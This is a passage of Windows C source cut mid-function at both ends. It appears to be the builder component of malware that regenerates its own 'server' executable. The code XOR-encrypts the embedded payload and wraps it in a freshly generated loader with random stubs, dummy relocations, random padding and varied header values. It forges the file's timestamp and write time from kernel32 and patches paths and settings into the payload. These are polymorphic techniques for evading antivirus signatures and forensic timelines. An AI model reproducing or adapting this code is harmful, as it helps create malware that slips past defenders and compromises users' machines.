          RtlMoveMemory( addraddr, ExeDef->ModuleImp[ i ],
                         ExeDef->ModuleImpCount[ i ] * sizeof( DWORD ) );
        }
        else {
#         ifdef TEST
            wsprintf( DbgMsg, "names for %s\r\n", ExeDef->ModuleName[ i ] );
            DbgOut();
#         endif
          for( f = 0; f < ExeDef->ModuleImpCount[ i ]; f++ ) {
            *(nameaddr + f) = (Names - ExeDef->IdataBuf + ExeDef->IdataSectionVA);
            *(addraddr + f) = (Names - ExeDef->IdataBuf + ExeDef->IdataSectionVA);
            *((WORD*)Names) = (WORD) (f + 1);
            Names += sizeof(WORD);
            Func = ExeDef->ModuleFunc[ i ][ ExeDef->ModuleImp[ i ][ f ] ];
            lstrcpy( Names, Func );
            Names += lstrlen( Func ) + 1;
          }
        }
        curr += ExeDef->ModuleImpCount[ i ] + 1;
        j++;
      }
    *Sz = Names - ExeDef->IdataBuf;   // size of idata section

    // now write idata section body

#   ifdef TEST
      wsprintf( DbgMsg, "writing idata section body: %d bytes\r\n", *Sz );
      DbgOut();
#   endif
    if( ! FileWrite( Fh, ExeDef->IdataBuf, *Sz ) ) return FALSE;

    return TRUE;
  }


static BOOL WriteResourceSection( HANDLE Fh, EXEDEF* ExeDef,
                                  DWORD* Sz, DWORD Timestamp, BYTE* ExeImage )
  {
    IMAGE_RESOURCE_DIRECTORY        *rd;
    IMAGE_RESOURCE_DIRECTORY_ENTRY  *rde, *rde2, *rde3;
    IMAGE_RESOURCE_DATA_ENTRY       *rdata;
    DWORD  i, j, Offset, DataEntryOffset, DataOffset;

    // make root entry

    rd = (IMAGE_RESOURCE_DIRECTORY*) (ExeDef->RsrcBuf);
    rd->Characteristics = 0;
    rd->TimeDateStamp = Timestamp;
    rd->MajorVersion = 0;
    rd->MinorVersion = 0;
    rd->NumberOfNamedEntries = 0;
    rd->NumberOfIdEntries = (USHORT) ExeDef->RsrcTypeCount;

    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    Offset = sizeof(IMAGE_RESOURCE_DIRECTORY) +
                          sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY)
                            * ExeDef->RsrcTypeCount;
#   ifdef TEST
      wsprintf( DbgMsg, "level 1 offset %08X\r\n", Offset );
      DbgOut();
#   endif
    for( i = 0; i < ExeDef->RsrcTypeCount; i++ ) {
      rde->Name = ExeDef->RsrcType[ i ];
      rde->OffsetToDirectory = Offset;
      rde->DataIsDirectory = 1;
      Offset += sizeof(IMAGE_RESOURCE_DIRECTORY) +
                            sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY)
                              * ExeDef->RsrcCount[ i ];
      rde++;
    }


    // make level 1 - resource names

#   ifdef TEST
      wsprintf( DbgMsg, "level 2 offset %08X\r\n", Offset );
      DbgOut();
#   endif
    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (ExeDef->RsrcBuf
                                  + sizeof(IMAGE_RESOURCE_DIRECTORY));
    for( i = 0; i < ExeDef->RsrcTypeCount; i++ ) {
      rd = (IMAGE_RESOURCE_DIRECTORY*) (ExeDef->RsrcBuf
                                         + rde->OffsetToDirectory);
      rd->Characteristics = 0;
      rd->TimeDateStamp = Timestamp;
      rd->MajorVersion = 0;
      rd->MinorVersion = 0;
      rd->NumberOfNamedEntries = 0;
      rd->NumberOfIdEntries = (USHORT) ExeDef->RsrcCount[ i ];

      rde2 = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
      for( j = 0; j < ExeDef->RsrcCount[ i ]; j++ ) {
        rde2->Name = ExeDef->RsrcId[ i ][ j ];
        rde2->OffsetToDirectory = Offset;
        rde2->DataIsDirectory = 1;
        Offset += sizeof(IMAGE_RESOURCE_DIRECTORY) +
                              sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY);
        rde2++;
      }
      rde++;
    }


    // make level 2 - resource languages

#   ifdef TEST
      wsprintf( DbgMsg, "data entriy array offset %08X\r\n", Offset );
      DbgOut();
#   endif
    DataEntryOffset = Offset; // array of RESOURCE_DATA_ENTRY
    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (ExeDef->RsrcBuf
                                  + sizeof(IMAGE_RESOURCE_DIRECTORY));
    for( i = 0; i < ExeDef->RsrcTypeCount; i++ ) {
      rde2 = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (ExeDef->RsrcBuf
                                         + rde->OffsetToDirectory
                                         + sizeof(IMAGE_RESOURCE_DIRECTORY));
      for( j = 0; j < ExeDef->RsrcCount[ i ]; j++ ) {
        rd = (IMAGE_RESOURCE_DIRECTORY*) (ExeDef->RsrcBuf
                                           + rde2->OffsetToDirectory);
        rd->Characteristics = 0;
        rd->TimeDateStamp = Timestamp;
        rd->MajorVersion = 0;
        rd->MinorVersion = 0;
        rd->NumberOfNamedEntries = 0;
        rd->NumberOfIdEntries = 1;

        rde3 = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
        rde3->Name = 0;
        rde3->OffsetToDirectory = Offset;
        rde3->DataIsDirectory = 0;
        Offset += sizeof(IMAGE_RESOURCE_DATA_ENTRY);
        rde2++;
      }
      rde++;
    }


    // fill data entries

#   ifdef TEST
      wsprintf( DbgMsg, "data offset %08X (must be less than %08X)\r\n", Offset, ExeDef->RsrcSectionSz );
      DbgOut();
#   endif
    DataOffset = Offset;
    rdata = (IMAGE_RESOURCE_DATA_ENTRY*) (ExeDef->RsrcBuf + DataEntryOffset);
    for( i = 0; i < ExeDef->RsrcTypeCount; i++ ) {
      for( j = 0; j < ExeDef->RsrcCount[ i ]; j++ ) {
        rdata->OffsetToData = Offset + ExeDef->RsrcSectionVA;
        rdata->CodePage = 0;
        rdata->Reserved = 0;
        if( ExeDef->RsrcType[ i ] == ExeDef->ExeResType &&
            ExeDef->RsrcId[ i ][ j ] == ExeDef->ExeResId )
          rdata->Size = ExeDef->ActualExeSize;
        else
          rdata->Size = (ExeDef->RsrcSize[ i ][ j ] + 3) & ~3;
        Offset += rdata->Size;
        rdata++;
      }
    }
    *Sz = Offset;


    // write resource directory

    if( ! FileWrite( Fh, ExeDef->RsrcBuf, DataOffset ) ) return FALSE;


    // write resource data

    for( i = 0; i < ExeDef->RsrcTypeCount; i++ )
      for( j = 0; j < ExeDef->RsrcCount[ i ]; j++ ) {
        if( ExeDef->RsrcType[ i ] == ExeDef->ExeResType &&
            ExeDef->RsrcId[ i ][ j ] == ExeDef->ExeResId ) {
          if( ! FileWrite( Fh, ExeImage,
                           ExeDef->ActualExeSize ) ) return FALSE;
        }
        else {
          if( ! WriteAlignRandom( Fh,
                      ExeDef->RsrcSize[ i ][ j ], 4, &Offset ) ) return FALSE;
        }
      }

    return TRUE;
  }


static int AdjustPrevSectionSize( HANDLE Fh,
                                  IMAGE_SECTION_HEADER* sh, DWORD* Offset )
  {
    DWORD  NewVA;
    int    Sz, i, Written;

    NewVA = (sh[0].VirtualAddress + sh[0].SizeOfRawData + 4095) & ~4095;
    Sz = sh[1].VirtualAddress - NewVA;
    if( Sz <= 0 ) return 0;
    sh[0].SizeOfRawData += Sz;
    *Offset += Sz;
    Written = 0;
    while( Written < Sz ) {
      i = Sz - Written; if( i > 512 ) i = 512;
      FileWrite( Fh, ZeroBytes, i );
      Written += i;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "section size (VA=%08X) adjusted %08X\r\n", sh[0].VirtualAddress, Sz );
      DbgOut();
#   endif
    return Sz;
  }


static BOOL LinkNewExe( HANDLE Fh, EXEDEF* ExeDef, BYTE* ExeImage )
  {
    IMAGE_FILE_HEADER      pehdr;
    IMAGE_FILE_HEADER      *ipehdr;
    IMAGE_OPTIONAL_HEADER  oh;
    IMAGE_OPTIONAL_HEADER  *ioh;
    IMAGE_SECTION_HEADER   sh[ MAX_SECTIONS + 1 ];
    FILETIME  KernelTime;
    DWORD     i, j, IdxImport, IdxRsrc, IdxReloc;
    DWORD     PEOffset, Offset, Timestamp, SectionOrder;
    DWORD     AlignedCodeSectionSz;
    DWORD     ActualRsrcSectionSz, ActualIdataSectionSz;

#   ifdef TEST
      wsprintf( DbgMsg, "linking\r\n" );
      DbgOut();
#   endif

    RtlZeroMemory( ZeroBytes, 512 );
    ipehdr = (IMAGE_FILE_HEADER*) PEFHDROFFSET( ExeImage );
    ioh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( ExeImage );


    // get date/time and timestamp of kernel32

    Timestamp = GetKernelTimeStamp( &KernelTime );
    if( Timestamp == 0 ) return FALSE;
    Timestamp -= Rand() & 0x000FFFFF;
#   ifdef TEST
      wsprintf( DbgMsg, "timestamp %08X\r\n", Timestamp );
      DbgOut();
#   endif


    // add dummy relocations for data section

    j = 0;
    for( i = 0; i < ExeDef->DataRelocations; i++ ) {
      j += Rand() % (((ExeDef->DataSectionSz / 4) - j - i)
                       / (ExeDef->DataRelocations - i));
#     ifdef TEST
        wsprintf( DbgMsg, "relocation %d: %08X\r\n", i, (i + j) * 4 );
        DbgOut();
#     endif
      AddRelocation( ExeDef->DataSectionVA + (i + j) * 4 , ExeDef );
    }
    EndUpRelocationBlock( ExeDef );


    // write stub

    i = Rand() % STUB_COUNT;
#   ifdef TEST
      wsprintf( DbgMsg, "stub %d, size %d\r\n", i, StubSz[ i ] );
      DbgOut();
#   endif
    if( ! FileWrite( Fh, Stubs[ i ], StubSz[ i ] ) ) return FALSE;
    PEOffset = StubSz[ i ];


    // make up PE and optional headers

    AlignedCodeSectionSz = (ExeDef->CodeSectionSz + 511) & ~511;

    pehdr.Machine = ipehdr->Machine;
    pehdr.NumberOfSections = (WORD) (ExeDef->NumberOfSections);
    pehdr.TimeDateStamp = Timestamp;
    pehdr.PointerToSymbolTable = 0;
    pehdr.NumberOfSymbols = 0;
    pehdr.SizeOfOptionalHeader = sizeof( IMAGE_OPTIONAL_HEADER );
    pehdr.Characteristics = ipehdr->Characteristics;

    RtlZeroMemory( &oh, sizeof( oh ) );
    oh.Magic = ioh->Magic;
    oh.MajorLinkerVersion = ioh->MajorLinkerVersion;
    oh.MinorLinkerVersion = (UCHAR) (((Rand() & 3) * (-1) * (Rand() & 1)
                                    + (DWORD) ioh->MinorLinkerVersion) & 0x3F);
    oh.SizeOfCode = AlignedCodeSectionSz;
    oh.SizeOfUninitializedData = (ExeDef->BssSectionSz + 511) & ~511;
    oh.AddressOfEntryPoint = ExeDef->EntryPoint + ExeDef->CodeSectionVA;
    oh.BaseOfCode = ExeDef->CodeSectionVA;
    oh.ImageBase = IMAGE_BASE;
    oh.SectionAlignment = 4096;
    oh.FileAlignment = 512;
    oh.MajorOperatingSystemVersion = ioh->MajorOperatingSystemVersion;
    oh.MinorOperatingSystemVersion = ioh->MinorOperatingSystemVersion;
    oh.MajorImageVersion = ioh->MajorImageVersion;
    oh.MinorImageVersion = ioh->MinorImageVersion;
    oh.MajorSubsystemVersion = ioh->MajorSubsystemVersion;
    oh.MinorSubsystemVersion = ioh->MinorSubsystemVersion;
    oh.Win32VersionValue = ioh->Win32VersionValue;
    oh.SizeOfImage = ExeDef->SizeOfImage;
    oh.SizeOfHeaders = (PEOffset + 4 + sizeof(IMAGE_FILE_HEADER)
                    + sizeof(IMAGE_OPTIONAL_HEADER)
                    + sizeof(IMAGE_SECTION_HEADER)
                          * ExeDef->NumberOfSections + 511) & ~511;
    oh.CheckSum = 0;
    oh.Subsystem = ioh->Subsystem;
    oh.DllCharacteristics = ioh->DllCharacteristics;
    oh.SizeOfStackReserve = ioh->SizeOfStackReserve;
    oh.SizeOfStackCommit = ioh->SizeOfStackCommit;
    oh.SizeOfHeapReserve = ioh->SizeOfHeapReserve;
    oh.SizeOfHeapCommit = ioh->SizeOfHeapCommit;
    oh.LoaderFlags = ioh->LoaderFlags;
    oh.NumberOfRvaAndSizes = 16;


    // encrypt exe image

    Crypt( ExeImage, ExeDef->ActualExeSize,
           ExeDef->XorValues[0], ExeDef->XorValues[1],
           ExeDef->XorValues[2], ExeDef->XorValues[3] );


    // since we don't know actial size of idata and rsrc sections,
    // write headers later

    if( SetFilePointer( Fh, oh.SizeOfHeaders,
                        NULL, FILE_BEGIN ) != oh.SizeOfHeaders ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot set file pointer to %d, error %d (%08X)\r\n",
                  oh.SizeOfHeaders, GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    Offset = oh.SizeOfHeaders;


    // write code section first and prepare section header

    RtlZeroMemory( sh, sizeof( sh ) );
    lstrcpy( sh[0].Name, ExeDef->CodeSectionName );
    sh[0].VirtualAddress = ExeDef->CodeSectionVA;
    sh[0].SizeOfRawData = AlignedCodeSectionSz;
    sh[0].PointerToRawData = Offset;
    sh[0].Characteristics = 0x60000020;

#   ifdef TEST
      wsprintf( DbgMsg, "code section at %08X, %08X bytes\r\n", Offset, AlignedCodeSectionSz );
      DbgOut();
#   endif

    if( ! FileWrite( Fh, ExeDef->CodeBuf,
                     ExeDef->CodeSectionSz ) ) return FALSE;
    if( AlignedCodeSectionSz > ExeDef->CodeSectionSz )
      if( ! FileWrite( Fh, ZeroBytes,
                AlignedCodeSectionSz - ExeDef->CodeSectionSz ) ) return FALSE;
    Offset += AlignedCodeSectionSz;


    // now write other sections and prepare section headers

    SectionOrder = ExeDef->SectionOrder;
    for( i = 1; i < ExeDef->NumberOfSections; i++ ) {
      switch( SectionOrder & 0xF ) {

        case SECTION_DATA:
#         ifdef TEST
            wsprintf( DbgMsg, "data section (%s) at %08X\r\n", ExeDef->DataSectionName, Offset );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, ExeDef->DataSectionName );
          sh[ i ].VirtualAddress = ExeDef->DataSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = Offset;
          sh[ i ].Characteristics = 0xC0000040;
          if( ! WriteAlignRandom( Fh, ExeDef->DataSectionSz, 512, &j ) )
            return FALSE;
          sh[ i ].SizeOfRawData = j;
          Offset += j;
          break;

        case SECTION_RDATA:
#         ifdef TEST
            wsprintf( DbgMsg, "rdata section (%s) at %08X\r\n", RdataSecName, Offset );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, RdataSecName );
          sh[ i ].VirtualAddress = ExeDef->RdataSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = Offset;
          sh[ i ].Characteristics = 0x40000040;
          if( ! WriteAlignRandom( Fh, ExeDef->RdataSectionSz, 512, &j ) )
            return FALSE;
          sh[ i ].SizeOfRawData = j;
          Offset += j;
          break;

        case SECTION_BSS:
#         ifdef TEST
            wsprintf( DbgMsg, "bss section (%s)\r\n", ExeDef->BssSectionName );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, ExeDef->BssSectionName );
          sh[ i ].VirtualAddress = ExeDef->BssSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = 0;
          sh[ i ].Characteristics = 0xC0000080;
          sh[ i ].SizeOfRawData = (ExeDef->BssSectionSz + 511) & ~511;;
          break;

        case SECTION_RELOC:
#         ifdef TEST
            wsprintf( DbgMsg, "reloc section (%s) at %08X\r\n", RelocSecName, Offset );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, RelocSecName );
          sh[ i ].VirtualAddress = ExeDef->RelocSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = Offset;
          sh[ i ].Characteristics = 0x42000040;
          j = (ExeDef->RelocBufIdx + 511) & ~511;
          if( ! FileWrite( Fh, ExeDef->RelocBuf, ExeDef->RelocBufIdx ) )
            return FALSE;
          if( j > ExeDef->RelocBufIdx )
            if( ! FileWrite( Fh, ZeroBytes, j - ExeDef->RelocBufIdx ) )
              return FALSE;
          sh[ i ].SizeOfRawData = j;
          Offset += j;
          IdxReloc = i;
          break;

        case SECTION_IMPORT:
#         ifdef TEST
            wsprintf( DbgMsg, "idata section (%s) at %08X\r\n", IdataSecName, Offset );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, IdataSecName );
          sh[ i ].VirtualAddress = ExeDef->IdataSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = Offset;
          sh[ i ].Characteristics = 0x40000040;
          if( ! WriteImportSection( Fh, ExeDef, &ActualIdataSectionSz ) )
            return FALSE;
          j = (ActualIdataSectionSz + 511) & ~511;
          if( j > ActualIdataSectionSz )
            if( ! FileWrite( Fh, ZeroBytes, j - ActualIdataSectionSz ) )
              return FALSE;
          sh[ i ].SizeOfRawData = j;
          Offset += j;
          IdxImport = i;
          break;

        case SECTION_RESOURCE:
#         ifdef TEST
            wsprintf( DbgMsg, "rsrc section (%s) at %08X\r\n", RsrcSecName, Offset );
            DbgOut();
#         endif
          lstrcpy( sh[ i ].Name, RsrcSecName );
          sh[ i ].VirtualAddress = ExeDef->RsrcSectionVA;
          AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );
          sh[ i ].PointerToRawData = Offset;
          sh[ i ].Characteristics = 0x40000040;
          if( ! WriteResourceSection( Fh, ExeDef,
                                 &ActualRsrcSectionSz, Timestamp, ExeImage ) )
            return FALSE;
          j = (ActualRsrcSectionSz + 511) & ~511;
          if( j > ActualRsrcSectionSz )
            if( ! FileWrite( Fh, ZeroBytes, j - ActualRsrcSectionSz ) )
              return FALSE;
          sh[ i ].SizeOfRawData = j;
          Offset += j;
          IdxRsrc = i;
          break;
      }
      SectionOrder >>= 4;
    }
    sh[ i ].VirtualAddress = ExeDef->SizeOfImage;
    AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );

    oh.BaseOfData = sh[1].VirtualAddress;
    oh.SizeOfInitializedData = (ExeDef->DataSectionSz
                      + ActualIdataSectionSz
                      + ExeDef->RdataSectionSz + 511) & ~511;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].VirtualAddress = ExeDef->IdataSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].Size = sh[ IdxImport ].SizeOfRawData;//ActualIdataSectionSz;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].VirtualAddress = ExeDef->RsrcSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].Size = sh[ IdxRsrc ].SizeOfRawData;//ActualRsrcSectionSz;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ].VirtualAddress = ExeDef->RelocSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ].Size = sh[ IdxReloc ].SizeOfRawData;//ExeDef->RelocBufIdx;


    // write headers

#   ifdef TEST
      wsprintf( DbgMsg, "writing headers\r\n" );
      DbgOut();
#   endif

    if( SetFilePointer( Fh, PEOffset, NULL, FILE_BEGIN ) != PEOffset ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot set file pointer to %d, error %d (%08X)\r\n",
                  PEOffset, GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    i = 0x4550;
    if( ! FileWrite( Fh, &i, sizeof( DWORD ) ) ) return NULL;
    if( ! FileWrite( Fh, &pehdr, sizeof( pehdr ) ) ) return NULL;
    if( ! FileWrite( Fh, &oh, sizeof( oh ) ) ) return NULL;
    if( ! FileWrite( Fh, sh, sizeof( sh[0] ) * ExeDef->NumberOfSections ) )
      return NULL;
    j = SetFilePointer( Fh, 0, NULL, FILE_CURRENT );
    if( j == 0xFFFFFFFF ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot get file pointer, error %d (%08X)\r\n",
                  GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    if( j < oh.SizeOfHeaders )
      if( ! FileWrite( Fh, ZeroBytes, oh.SizeOfHeaders - j ) )
        return NULL;


    // finally, set date/time of last write

    if( ! SetFileTime( Fh, NULL, NULL, &KernelTime ) ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot set file time, error %d (%08X)\r\n",
                  GetLastError(), GetLastError() );
        DbgOut();
#     else
        return FALSE;
#     endif
    }

    return TRUE;
  }


static void* GetResourcePtr( BYTE* p, BOOL IsFile,
                             int ResType, int ResId, DWORD* ResourceSize )
  {
    IMAGE_OPTIONAL_HEADER     *oh;
    IMAGE_SECTION_HEADER      *sh;
    IMAGE_RESOURCE_DIRECTORY  *rd;
    IMAGE_RESOURCE_DIRECTORY_ENTRY   *rde;
    IMAGE_RESOURCE_DATA_ENTRY        *rdata;
    DWORD  raddr, rsize, scount, i, rsrcVA;
    BYTE   *rsec, *RetVal;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif


    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
    raddr = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].VirtualAddress;
    rsrcVA = raddr;
    rsize = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].Size;

    if( IsFile ) {

      // scanning sections for resources and set correct raddr

      scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
      sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
      for( i = 0; i < scount; i++, sh++ ) {
        if( raddr >= sh->VirtualAddress &&
            raddr < sh->VirtualAddress + sh->SizeOfRawData ) {
          raddr = sh->PointerToRawData;
#         ifdef TEST
            wsprintf( DbgMsg, "GetResourcePtr: scan - rsrc section at %08X\r\n", sh->PointerToRawData );
            DbgOut();
#         endif
          break;
        }
      }
      if( i >= scount ) raddr = 0;
    }
    if( raddr == 0 || rsize == 0 ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: rsrc section not found\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource section addr 0x%X, size 0x%X\r\n", raddr, rsize );
      DbgOut();
#   endif

    rsec = p + raddr;

    // scan root level of resource tree for type

    rd = (IMAGE_RESOURCE_DIRECTORY*) rsec;
    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResType == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource type %d not found\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate type entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource type %d is located at %08X\r\n", ResType, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( ! rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: invalid directory entry for resource type %d\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
    rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);

    // scan second level of resource tree for id

    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResId == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource id %d not found\r\n", ResId );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate id entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource id %d is located at %08X\r\n", ResId, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( rde->DataIsDirectory ) {

      // if entry doesn't points to resource data immediately,
      // get resource data from the third level of resource tree

      rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);
      rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
      if( rd->NumberOfIdEntries < 1 ) {
#       ifdef TEST
          wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is empty\r\n", ResType, ResId );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
    }

    // here rde is the pointer to resource data entry

    if( rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource data is expected\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource data entry is located at %08X\r\n", rde->OffsetToDirectory );
      DbgOut();
#   endif
    rdata = (IMAGE_RESOURCE_DATA_ENTRY*) (rsec + rde->OffsetToDirectory);
    if( ResourceSize != NULL ) *ResourceSize = rdata->Size;
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is at %08X\r\n", ResType, ResId, rdata->OffsetToData );
      DbgOut();
#   endif

    if( IsFile ) RetVal = rsec + (rdata->OffsetToData - rsrcVA);
    else RetVal = p + rdata->OffsetToData;

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: will be returned for %d, %d: %08X, %d (rsrc VA %X)\r\n",
                ResId, ResType, (DWORD) RetVal, *ResourceSize, rsrcVA );
      DbgOut();
      DbgDestroyOutput();
#   endif

    return (void*) RetVal;
  }


static void PatchExeImage( BYTE* ExeImage, char* FNames, BYTE* Cfg, DWORD CfgSz )
  {
    BYTE*  p;
    DWORD  s;

    if( FNames != NULL ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_PATHS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying paths\r\n" );
          DbgOut();
#       endif
        lstrcpy( p, FNames );
      }
    }
    if( Cfg != NULL && CfgSz != 0 ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_SETTINGS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying settings\r\n" );
          DbgOut();
#       endif
        CopyMemory( p, Cfg, CfgSz );
      }
    }
  }



/*****************************************************************************
  Morphs itself into new file;
  Fh is the handle of destination file
*/

BOOL SM_MorphServer( HANDLE Fh, DWORD ResId, char* FNames,
                     BYTE* Cfg, DWORD CfgSz )
  {
    void    *ExeImage, *LoaderImage;
    DWORD   ExeImageSize, LoaderImageSize;
    BOOL    Rc;
    LOADERDATA*  LoaderData;
    EXEDEF*      ExeDef;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif

    Rc = FALSE;
    Srand( GetTickCount() );
    ExeImage = GetExecutableImage( &ExeImageSize, ResId );
    if( ExeImage != NULL ) {

      PatchExeImage( ExeImage, FNames, Cfg, CfgSz );

      /*
        we have our executable source;
        get original loader attached to the executable
      */
      LoaderImage = SM_GetResource( RT_FILE, IDF_SMLOADER, &LoaderImageSize );
      if( LoaderImage == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_LoadResource failed\r\n" );
          DbgOut();
#       endif
      }
      else {
        /*
          we have the pointer to the original loader
          read its data and code into convenient structure
        */ 
        LoaderData = GetLoaderData( LoaderImage );
        if( LoaderData != NULL ) {
          /*
            Generate main structure of new executable file - size of loader,
            size of attached executable, another dummy resources,
            dummy imports, and so on.
          */
          ExeDef = DefineNewExe( LoaderData, ExeImage );
          if( ExeDef != NULL ) {
            /*
              Now generate loader
            */
            GenerateLoaderCode( ExeDef, LoaderData );
            /*
              Finally, link executable file
            */
            Rc = LinkNewExe( Fh, ExeDef, ExeImage );
            LocalFree( ExeDef );
          }
          LocalFree( LoaderData );
        }
      }
      LocalFree( ExeImage );
    }

#   ifdef TEST
      DbgDestroyOutput();
#   endif

    return Rc;
  }


/*****************************************************************************
  Get pointer to the resource data (also returns resource size)
  attached to the currently executing image. This means, if
  image was loaded by loader, it does not uses api functions
*/

void* SM_GetResource( int ResType, int ResId, DWORD* ResourceSize )
  {
    BYTE     *p;
    HRSRC    Rh;
    DWORD    s;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif

    // get image base address

    p = (BYTE*) GetModuleHandle( NULL );
    if( p == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: GetModuleHandle( NULL ) returned NULL, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "SM_GetResource: current image base address 0x%08X\r\n", (DWORD) p );
      DbgOut();
#   endif

    // get entry point

    p += ((IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p ))->AddressOfEntryPoint;

    // check loader's signature

    if( *((DWORD*) p) != 0x5A5A5A5A ) {


      // we are operating as regular program so use api functions

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: using API\r\n" );
        DbgOut();
#     endif

      Rh = FindResource( NULL, MAKEINTRESOURCE( ResId ),
                               MAKEINTRESOURCE( ResType ) );
      if( Rh == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: FindResource( NULL, %d, %d ) returned NULL, last error = %d (0x%08X)\r\n",
                    ResId, ResType, GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
      p = (BYTE*) LoadResource( NULL, Rh );
      if( p == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: LoadResource returned NULL, last error = %d (0x%08X)\r\n",
                    GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
